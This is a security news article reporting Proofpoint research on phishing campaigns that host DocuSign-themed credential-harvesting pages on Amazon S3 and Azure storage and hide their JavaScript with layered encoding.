Phishing Attacks Enlist Amazon AWS, Microsoft Azure in Ploys

amazon public cloud aws phishing

An ongoing campaign is hosting its phishing landing pages on enterprise-class public cloud storage services — a nascent trend meant to throw defenders off.

Recent phishing campaigns have been spotted boosting their anti-detection efforts by using Amazon Web Services to host their landing pages. It’s a sign of a nascent trend towards using public cloud storage, according to researchers.

The attackers are also layering on various obfuscation techniques, including multibyte XOR encoding, according to the analysis, released by Proofpoint on Thursday.

“Threat actors, and most recently phishers, have been able to evade detection by using well-known and trusted consumer cloud, social networking and commerce services to host malicious phishing kits,” the researchers said in a posting on Thursday. “Some actors have now graduated from using consumer cloud storage such as Google Drive and Dropbox to more enterprise-class public cloud storage providers such as AWS and Microsoft Azure, and continue to use various encoding techniques in their landing web pages via JavaScript in order to evade detection.”

In late July, a targeted phishing campaign kicked off using the branding and email formatting of DocuSign. An email asks a target to sign a document electronically. If the visitor enters their information on the DocuSign landing page, they will then be redirected to a lookalike of the webmail service they indicated, and another phishing landing will try to steal the credentials.

The DocuSign campaign has no particular vertical targeting, researchers said, but the phishing lure was only sent to a small group of people across various organizations.

“Visually, it appears as a fairly standard phishing lure for documents purporting to be shared via DocuSign,” researchers said. “While the landing page for the credential phish also convincingly resembles DocuSign in branding and overall format, it is actually a phishing template that has been commonly used over the past few years.”

What’s not so common is the fact that the landing page was hosted on Amazon S3. According to Proofpoint, this is a continuation of adversaries’ growing interest in public cloud buckets. Proofpoint has also recently documented threat actors abusing Microsoft’s Azure Blob Storage, it said.

The page uses JavaScript encoding, according to the analysis, with multiple layers. “A large array of hex-encoded strings which, when decoded, appears to include some ciphertext as well as a few strings, and then an eval statement to decode the encoded blob,” researchers wrote. “The encoding and variable names will often change with each deployment of the landing.”

Once decoded, it becomes clear that the phishing kit pulls remote resources from multiple websites, which have TLS certificates from Let’s Encrypt – they all trace back to a user registered as “phasephaser[@]”.

“The actor engaging in this activity is not new to hosting on AWS, as we have observed it in similar low-volume campaigns throughout the year,” the researchers said. “All non-AWS domains have utilized Let’s Encrypt TLS certificates, and most appear to be registered with Russian domain registration services. While all phishing was hosted on AWS during this period, in some cases the actor used other public cloud infrastructure to host specific resources for the landing pages.”

Use of enterprise cloud services is still a fledgling technique, Proofpoint researchers said, and while Amazon has been responsive and “especially vigilant” in taking down abusive accounts, they warned that defenders should be aware that cloud storage is growing attack tool.

Black Hat USA 2019 has kicked off this week in Las Vegas. For more Threatpost breaking news, stories and videos from Black Hat and DEF CON, click here.

Suggested articles